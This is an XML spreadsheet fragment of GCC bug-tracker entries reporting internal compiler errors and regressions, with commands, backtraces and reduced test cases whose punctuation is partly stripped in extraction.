  <si>
    <t>Compiling some complex template code causes internal compiler error.
g++ -v -save-temps rsa.cpp
Reading specs from /usr/local/lib/gcc-lib/i686-pc-cygwin/3.0.2/specs
Configured with: ../gcc-3.0.2/configure
Thread model: single
gcc version 3.0.2
 /usr/local/lib/gcc-lib/i686-pc-cygwin/3.0.2/cpp0.exe -lang-c++ -D__GNUG__=3 -D_
_GXX_DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNUC_
MINOR__=0 -D__GNUC_PATCHLEVEL__=2 -D_X86_=1 -D_X86_=1 -Asystem=winnt -D__NO_INLI
NE__ -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D
__tune_i686__ -D__tune_pentiumpro__ -D__stdcall=__attribute__((__stdcall__)) -D_
_cdecl=__attribute__((__cdecl__)) -D_stdcall=__attribute__((__stdcall__)) -D_cde
cl=__attribute__((__cdecl__)) -D__declspec(x)=__attribute__((x)) -D__i386__ -D__
i386 -D__CYGWIN32__ -D__CYGWIN__ -Dunix -D__unix__ -D__unix -isystem /usr/local/
include -idirafter /usr/include -idirafter /usr/include/w32api rsa.cpp rsa.ii
GNU CPP version 3.0.2 (cpplib) (80386 BSD syntax)
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-cygwin
 /usr/local/include/g++-v3/backward
 /usr/local/lib/gcc-lib/i686-pc-cygwin/3.0.2/include
 /usr/include
 /usr/include/w32api
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-cygwin/3.0.2/cc1plus.exe -fpreprocessed rsa.ii -
quiet -dumpbase rsa.cpp -version -o rsa.s
GNU CPP version 3.0.2 (cpplib) (80386 BSD syntax)
GNU C++ version 3.0.2 (i686-pc-cygwin)
        compiled by GNU C version 3.0.2.
rsa.cpp: In function `void CryptoPP::RSA_TestInstantiations()':
rsa.cpp:17: Internal compiler error in lookup_template_class at cp/pt.c:3961
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
3.0.2
Environment:
Windows 2000 SP2 Cygwin 1.3.3
How-To-Repeat:
run g++ rsa.ii</t>
  </si>
  <si>
    <t>weidai</t>
  </si>
  <si>
    <t>GCC-8002</t>
  </si>
  <si>
    <t>internal compiler error: in trunc_int_for_mode at explow.c:54 (Alpha)</t>
  </si>
  <si>
    <t>gcc from CVS 20020922 fails to compile
sysdeps/ieee754/flt-32/s_expm1f.c from glibc when optimizing. I've
attached a preprocessed trimmed-down version. The problem is not
present in gcc 3.2.
Release:
3.3 20020922 (experimental)
Environment:
System: Linux juist 2.4.18-4.2nhd #1 Sat Jun 15 21:17:26 MDT 2002 alpha unknown unknown GNU/Linux
Architecture: alpha
host: alphaev68-unknown-linux-gnu
build: alphaev68-unknown-linux-gnu
target: alphaev68-unknown-linux-gnu
configured with: ../configure --enable-languages=c
How-To-Repeat:
% gcc-3.2 -c -O3 foo.i # works
% gcc -c foo.i # works
% gcc -c -O1 foo.i
foo.i: In function `__expm1f':
foo.i:122: internal compiler error: in trunc_int_for_mode at explow.c:54
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
% cat foo.i
typedef int int32_t __attribute__ ((__mode__ (__SI__)))
typedef unsigned int u_int32_t __attribute__ ((__mode__ (__SI__)))
typedef union
{
  double value
  struct
  {
    u_int32_t lsw
    u_int32_t msw
  } parts
} ieee_double_shape_type
typedef union
{
  float value
  u_int32_t word
} ieee_float_shape_type
static const volatile float huge = 1.0e+30 tiny = 1.0e-30
static const float
one = 1.0
o_threshold = 8.8721679688e+01
ln2_hi = 6.9313812256e-01
ln2_lo = 9.0580006145e-06
invln2 = 1.4426950216e+00
Q1 = -3.3333335072e-02
Q2 = 1.5873016091e-03
Q3 = -7.9365076090e-05
Q4 = 4.0082177293e-06
Q5 = -2.0109921195e-07
float __expm1f(float x)
{
        float yhiloctehxshfxr1
        int32_t kxsb
        u_int32_t hx
        do { ieee_float_shape_type gf_u gf_u.value = (x) (hx) = gf_u.word } while (0)
        xsb = hx
        if(xsb==0) y=x else y= -x
        hx 
        if(hx &gt;= 0x4195b844) {
            if(hx &gt;= 0x42b17218) {
                if(hx&gt;0x7f800000)
                    return x+x
                if(hx==0x7f800000)
                    return (xsb==0)? x:-1.0
                if(x &gt; o_threshold) return huge*huge
            }
            if(xsb!=0) {
                if(x+tiny&lt;(float)0.0)
                return tiny-one
            }
        }
        if(hx &gt; 0x3eb17218) {
            if(hx &lt; 0x3F851592) {
                if(xsb==0)
                    {hi = x - ln2_hi lo = ln2_lo k = 1}
                else
                    {hi = x + ln2_hi lo = -ln2_lo k = -1}
            } else {
                k = invln2*x+((xsb==0)?(float)0.5:(float)-0.5)
                t = k
                hi = x - t*ln2_hi
                lo = t*ln2_lo
            }
            x = hi - lo
            c = (hi-x)-lo
        }
        else if(hx &lt; 0x33000000) {
            t = huge+x
            return x - (t-(huge+x))
        }
        else k = 0
        hfx = (float)0.5*x
        hxs = x*hfx
        r1 = one+hxs*(Q1+hxs*(Q2+hxs*(Q3+hxs*(Q4+hxs*Q5))))
        t = (float)3.0-r1*hfx
        e = hxs*((r1-t)/((float)6.0 - x*t))
        if(k==0) return x - (x*e-hxs)
        else {
            e = (x*(e-c)-c)
            e -= hxs
            if(k== -1) return (float)0.5*(x-e)-(float)0.5
            if(k==1) {
                if(x &lt; (float)-0.25) return -(float)2.0*(e-(x+(float)0.5))
                else return one+(float)2.0*(x-e)
            }
            if (k 56) {
                int32_t i
                y = one-(e-x)
                do { ieee_float_shape_type gf_u gf_u.value = (y) (i) = gf_u.word } while (0)
                do { ieee_float_shape_type sf_u sf_u.word = (i+(k&lt;&lt;23)) (y) = sf_u.value } while (0)
                return y-one
            }
            t = one
            if(k&lt;23) {
                int32_t i
                do { ieee_float_shape_type sf_u sf_u.word = (0x3f800000 - (0x1000000&gt;&gt;k)) (t) = sf_u.value } while (0)
                y = t-(e-x)
                do { ieee_float_shape_type gf_u gf_u.value = (y) (i) = gf_u.word } while (0)
                do { ieee_float_shape_type sf_u sf_u.word = (i+(k&lt;&lt;23)) (y) = sf_u.value } while (0)
           } else {
                int32_t i
                do { ieee_float_shape_type sf_u sf_u.word = (((0x7f-k)&lt;&lt;23)) (t) = sf_u.value } while (0)
                y = x-(e+t)
                y += one
                do { ieee_float_shape_type gf_u gf_u.value = (y) (i) = gf_u.word } while (0)
                do { ieee_float_shape_type sf_u sf_u.word = (i+(k&lt;&lt;23)) (y) = sf_u.value } while (0)
            }
        }
        return y
}</t>
  </si>
  <si>
    <t>GCC-57174</t>
  </si>
  <si>
    <t>[Fortran-Dev] RTE triggered by type component allocation</t>
  </si>
  <si>
    <t>The following code when compiled with the fortran-dev from 20130430 produces the error
At line 18 of file PMRgf.f90
Fortran runtime error: Attempting to allocate already allocated variable '__tmp_type_t2'
at execution time.
module mod_noninter_array_01
  implicit none
  type :: t1
     integer allocatable :: i(:)
  end type t1
  type extends(t1) :: t2
     real pointer :: p
  end type
end module mod_noninter_array_01
program noninter_array_01
  use mod_noninter_array_01
  implicit none
  class(t1) allocatable :: n_t1(::)
  allocate(t2 :: n_t1(22))
  select type(n_t1)
  type is (t2)
    allocate(n_t1(12)%i(2) source=[23])
  end select
end program noninter_array_01</t>
  </si>
  <si>
    <t>Bader</t>
  </si>
  <si>
    <t>GCC-58207</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 Regression] ICE in sort_constexpr_mem_initializers due to out of bounds vector access</t>
  </si>
  <si>
    <t>Created attachment 30680
preprocessed and somewhat reduced test case
The attached test case causes an ICE after errors with xg++ (GCC) 4.9.0 20130817 (experimental) as well as with g++ 4.8.0 but not with g++ 4.7.2
#0  diagnostic_report_diagnostic (context=0x1823300  diagnostic=diagnostic@entry=0x7fffffffda00) at ../../gcc/gcc/diagnostic.c:757
        location = 3464477
        orig_diag_kind = DK_ICE
        saved_format_spec = 
#1  0x0000000000ffbf80 in internal_error (gmsgid=gmsgid@entry=0x13e2d6b in %s at %s:%d) at ../../gcc/gcc/diagnostic.c:1127
        diagnostic = {message = {format_spec = 0x13e2d6b in %s at %s:%d args_ptr = 0x7fffffffd9e8 err_no = 2 locus = 0x7ffff6974093  x_data = 0x0} location = 3464477 override_column = 0
          x_data = 0x0 kind = DK_ICE option_index = 0}
        ap = {{gp_offset = 8 fp_offset = 48 overflow_arg_area = 0x7fffffffdb00 reg_save_area = 0x7fffffffda40}}
        __FUNCTION__ = internal_error
#2  0x0000000000ffa7f4 in fancy_abort (file=file@entry=0x109f4c0 ../../gcc/gcc/vec.h line=line@entry=827 function=function@entry=0x10cf8a0  operator[])
    at ../../gcc/gcc/diagnostic.c:1181
No locals.
#3  0x00000000006be2b8 in vec::operator[] (ix=0 this=) at ../../gcc/gcc/vec.h:827
No locals.
#4  0x00000000006d6427 in operator[] (ix= this=) at ../../gcc/gcc/tree.h:4111
No locals.
#5  build_constexpr_constructor_member_initializers (body= type=0x7ffff5337bd0) at ../../gcc/gcc/cp/semantics.c:6207
        vec = 0x7ffff5376e58
        ok = 
#6  massage_constexpr_body (fun=fun@entry=0x7ffff53c5300 body=body@entry=0x7ffff53bbb10) at ../../gcc/gcc/cp/semantics.c:6280
        __FUNCTION__ = massage_constexpr_body
#7  0x00000000006ddbb4 in register_constexpr_fundef (fun=fun@entry=0x7ffff53c5300 body=0x7ffff53bbb10) at ../../gcc/gcc/cp/semantics.c:6384
        entry = {decl = 0x7ffff53c5300 body = 0x2}
        slot = 
        __FUNCTION__ = register_constexpr_fundef
#8  0x000000000057c058 in maybe_save_function_definition (fun=) at ../../gcc/gcc/cp/decl.c:13761
No locals.
#9  finish_function (flags=flags@entry=3) at ../../gcc/gcc/cp/decl.c:13882
        fndecl = 0x7ffff53c5300
        fntype = 0x7ffff53c6000
        ctype = 0x0
        __FUNCTION__ = finish_function
        inclass_inline = 1
#10 0x00000000006643be in cp_parser_function_definition_after_declarator (parser=parser@entry=0x7ffff68d40b0 inline_p=inline_p@entry=true) at ../../gcc/gcc/cp/parser.c:22275
        fn = 
        ctor_initializer_p = true
        saved_in_unbraced_linkage_specification_p = false
        saved_in_function_body = false
        saved_num_template_parameter_lists = 0
#11 0x000000000064a09d in cp_parser_late_parsing_for_member (member_function= parser=0x7ffff68d40b0) at ../../gcc/gcc/cp/parser.c:22921
        function_scope = 0x0
        tokens = 0x7ffff538cbc0
#12 cp_parser_class_specifier_1 (parser=parser@entry=0x7ffff68d40b0) at ../../gcc/gcc/cp/parser.c:19014
        decl = 
        pushed_scope = 
        e = 
        class_type = 
        ix = 3
        nested_name_specifier_p = 
        saved_num_template_parameter_lists = 
        saved_in_function_body = 
        saved_in_unbraced_linkage_specification_p = 
        scope = 
        type = 
        in_switch_statement_p = 
        __FUNCTION__ = cp_parser_class_specifier_1
        attributes = 
        in_statement = 
        old_scope = 
        closing_brace = 
#13 0x000000000064c211 in cp_parser_class_specifier (parser=0x7ffff68d40b0) at ../../gcc/gcc/cp/parser.c:19038
        ret = 
#14 cp_parser_type_specifier (parser=parser@entry=0x7ffff68d40b0 flags=flags@entry=1 decl_specs=decl_specs@entry=0x7fffffffdf00 is_declaration=is_declaration@entry=true
    declares_class_or_enum=declares_class_or_enum@entry=0x7fffffffde7c is_cv_qualifier=is_cv_qualifier@entry=0x7fffffffde7b) at ../../gcc/gcc/cp/parser.c:14040
        type_spec = 0x0
        keyword = 
        ds = ds_last
#15 0x00000000006616ca in cp_parser_decl_specifier_seq (parser=parser@entry=0x7ffff68d40b0 flags=flags@entry=1 decl_specs=decl_specs@entry=0x7fffffffdf00 declares_class_or_enum=declares_class_or_enum@entry=0x7fffffffdefc)
    at ../../gcc/gcc/cp/parser.c:11283
        decl_spec_declares_class_or_enum = 0
        is_cv_qualifier = false
        type_spec = 
        found_decl_spec = true
        __FUNCTION__ = cp_parser_decl_specifier_seq
        constructor_possible_p = 
        start_token = 
        ds = ds_last
#16 0x00000000006651aa in cp_parser_simple_declaration (parser=parser@entry=0x7ffff68d40b0 function_definition_allowed_p=function_definition_allowed_p@entry=true maybe_range_for_decl=maybe_range_for_decl@entry=0x0)
    at ../../gcc/gcc/cp/parser.c:10873
        decl_specifiers = {locations = {0 } type = 0x0 attributes = 0x0 std_attributes = 0x0 redefined_builtin_type = 0x0 storage_class = sc_none type_definition_p = 0 multiple_types_p = 0
          conflicting_specifiers_p = 0 any_specifiers_p = 0 any_type_specifiers_p = 0 explicit_int_p = 0 explicit_int128_p = 0 explicit_char_p = 0 gnu_thread_keyword_p = 0}
        declares_class_or_enum = 0
        saw_declarator = 
        __FUNCTION__ = cp_parser_simple_declaration
#17 0x00000000006671b1 in cp_parser_block_declaration (parser=0x7ffff68d40b0 statement_p=) at ../../gcc/gcc/cp/parser.c:10822
        statement_p = 
        parser = 0x7ffff68d40b0
#18 0x000000000067022c in cp_parser_declaration (parser=parser@entry=0x7ffff68d40b0) at ../../gcc/gcc/cp/parser.c:10719
        token1 = 
        saved_pedantic = 0
        token2 = 
        p = 0x18dba00
        attributes = 
#19 0x000000000066eefe in cp_parser_declaration_seq_opt (parser=parser@entry=0x7ffff68d40b0) at ../../gcc/gcc/cp/parser.c:10605
No locals.
#20 0x000000000066f111 in cp_parser_namespace_body (parser=0x7ffff68d40b0) at ../../gcc/gcc/cp/parser.c:15528
No locals.
#21 cp_parser_namespace_definition (parser=0x7ffff68d40b0) at ../../gcc/gcc/cp/parser.c:15509
        attribs = 0x0
        __FUNCTION__ = cp_parser_namespace_definition
        identifier = 0x7ffff6875058
        has_visibility = false
        is_inline = false
#22 0x000000000067019e in cp_parser_declaration (parser=parser@entry=0x7ffff68d40b0) at ../../gcc/gcc/cp/parser.c:10707
        token1 = {type =  keyword = RID_NAMESPACE flags =  pragma_kind =  implicit_extern_c =  ambiguous_p =  purged_p = 
          location =  u = {tree_check_value =  value = }}
        saved_pedantic = 0
        token2 = {type = CPP_NAME keyword = RID_MAX flags =  pragma_kind =  implicit_extern_c =  ambiguous_p =  purged_p = 
          location =  u = {tree_check_value =  value = }}
        p = 0x18dba00
        attributes = 0x0
#23 0x000000000066eefe in cp_parser_declaration_seq_opt (parser=parser@entry=0x7ffff68d40b0) at ../../gcc/gcc/cp/parser.c:10605
No locals.
#24 0x00000000006707b3 in cp_parser_translation_unit (parser=0x7ffff68d40b0) at ../../gcc/gcc/cp/parser.c:3930
        success = 
        declarator_obstack_base = 0x18dba00
#25 c_parse_file () at ../../gcc/gcc/cp/parser.c:28829
        already_called = true
#26 0x0000000000784375 in c_common_parse_file () at ../../gcc/gcc/c-family/c-opts.c:1046
        i = 0
#27 0x0000000000af5c26 in compile_file () at ../../gcc/gcc/toplev.c:546
No locals.
#28 0x0000000000af7a38 in do_compile () at ../../gcc/gcc/toplev.c:1878
No locals.
#29 toplev_main (argc=3 argv=0x7fffffffe2b8) at ../../gcc/gcc/toplev.c:1954
No locals.</t>
  </si>
  <si>
    <t>tsaunders</t>
  </si>
  <si>
    <t>GCC-56108</t>
  </si>
  <si>
    <t>Asm statement in transaction_relaxed crashes compiler.</t>
  </si>
  <si>
    <t>Created attachment 29273
Minimal test case.
Asm statement in transaction_relaxed crashes compiler.
Example:
// file: min.c
int main() {
  __transaction_relaxed{ asm() }
  return 0
}
Compiler error:
~# gcc -fgnu-tm min.c -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.7/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.7.2-2ubuntu1' --with-bugurl=file:///usr/share/doc/gcc-4.7/README.Bugs --enable-languages=cc++gofortranobjcobj-c++ --prefix=/usr --program-suffix=-4.7 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.7 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --enable-objc-gc --disable-werror --with-arch-32=i686 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.7.2 (Ubuntu/Linaro 4.7.2-2ubuntu1) 
COLLECT_GCC_OPTIONS='-fgnu-tm' '-v' '-mtune=generic' '-march=x86-64' '-pthread'
 /usr/lib/gcc/x86_64-linux-gnu/4.7/cc1 -quiet -v -imultiarch x86_64-linux-gnu -D_REENTRANT min.c -quiet -dumpbase min.c -mtune=generic -march=x86-64 -auxbase min -version -fgnu-tm -fstack-protector -o /tmp/cckJBrnc.s
GNU C (Ubuntu/Linaro 4.7.2-2ubuntu1) version 4.7.2 (x86_64-linux-gnu)
	compiled by GNU C version 4.7.2 GMP version 5.0.2 MPFR version 3.1.0-p3 MPC version 0.9
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
ignoring nonexistent directory /usr/local/include/x86_64-linux-gnu
ignoring nonexistent directory /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../../x86_64-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc/x86_64-linux-gnu/4.7/include
 /usr/local/include
 /usr/lib/gcc/x86_64-linux-gnu/4.7/include-fixed
 /usr/include/x86_64-linux-gnu
 /usr/include
End of search list.
GNU C (Ubuntu/Linaro 4.7.2-2ubuntu1) version 4.7.2 (x86_64-linux-gnu)
	compiled by GNU C version 4.7.2 GMP version 5.0.2 MPFR version 3.1.0-p3 MPC version 0.9
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: efa32fef7aa241fa03ac6d7ad2a4a2cf
min.c: In function â€˜mainâ€™:
min.c:1:5: internal compiler error: in expand_block_tm at trans-mem.c:2375
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccPdFHFN.out file please attach this to your bugreport.</t>
  </si>
  <si>
    <t>srdjan.stipic</t>
  </si>
  <si>
    <t>GCC-42701</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE on error recovery</t>
  </si>
  <si>
    <t>seen with trunk 20100107 on ix86:
$ g++ -c greg_month.ii
In file included from ./boost/date_time/gregorian/formatters.hpp:17:0
                 from libs/date_time/src/gregorian/greg_month.cpp:21:
./boost/date_time/date_formatting.hpp: In static member function 'static std::basic_string boost::date_time::ymd_formatter::ymd_to_string(ymd_type)':
./boost/date_time/date_formatting.hpp:87:36: error: cannot call constructor 'std::locale::locale' directly
./boost/date_time/date_formatting.hpp:87:36: note: for a function-style cast remove the redundant '::locale'
./boost/date_time/gregorian/formatters.hpp:65: confused by earlier errors bailing out
Preprocessed source stored into /tmp/ccNSCpcB.out file please attach this to your bugreport.</t>
  </si>
  <si>
    <t>GCC-9554</t>
  </si>
  <si>
    <t>[3.4 regression] Out of class declaration of member class template specialisation rejected</t>
  </si>
  <si>
    <t>The compiler rejects an out of class declaration of an explicit specialisation of a member class template complaining about privateness of that template.
This is a regression from an earlier gcc 3.2.2 snapshot.
Release:
3.4 20030129 (experimental)
Environment:
System: Linux thunderbird 2.4.20 #1 Sat Jan 11 12:08:38 CET 2003 i686 unknown
 Architecture: i686
 host: i686-pc-linux-gnu
 build: i686-pc-linux-gnu
 target: i686-pc-linux-gnu
 configured with: ./configure --prefix=/usr/local/gcc_newparser --enable-threads --disable-libgcj --enable-languages=cc++ --disable-nls
How-To-Repeat:
compiling the attached code with gcc 3.4 20030129</t>
  </si>
  <si>
    <t>GCC-69596</t>
  </si>
  <si>
    <t>vzeroupper is generated in interrupt handler</t>
  </si>
  <si>
    <t>[hjl@gnu-6 gcc]$ cat x.i
void
__attribute__((interrupt))
fn (void *frame)
{
  asm (#
       :
       :
       : xmm3)
}
[hjl@gnu-6 gcc]$ ./xgcc -B./ -S -O2 -mno-avx512f -mno-iamcu -mavx  x.i
[hjl@gnu-6 gcc]$ cat x.s
	.file	x.i
	.text
	.p2align 415
	.globl	fn
	.type	fn @function
fn:
.LFB0:
	.cfi_startproc
	vmovups	%ymm3 -32(%rsp)
	.cfi_offset 20 -40
#APP
# 5 x.i 1
	#
# 0  2
#NO_APP
	vzeroupper  &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; This isn't necessary
	vmovups	-32(%rsp) %ymm3
	iretq
	.cfi_endproc
.LFE0:
	.size	fn .-fn
	.ident	GCC: (GNU) 6.0.0 20160131 (experimental)
	.section	.note.GNU-stack@progbits
[hjl@gnu-6 gcc]$</t>
  </si>
  <si>
    <t>GCC-80657</t>
  </si>
  <si>
    <t>[7/8/9 Regression] Loop in character function declaration</t>
  </si>
  <si>
    <t>The following forces gfortran into a loop:
function f(x)
implicit character(len(f)) (x)
character(len(x)) f
end</t>
  </si>
  <si>
    <t>GCC-60224</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 Regression] ICE using invalid initializer for array</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 3.3 (with the exception of GCC 4.1.2):
==========================================
struct A {}
void foo()
{
  bool b[] = (int (A::*)())0
}
==========================================
bug.cc: In function 'void foo()':
bug.cc:5:28: internal compiler error: unex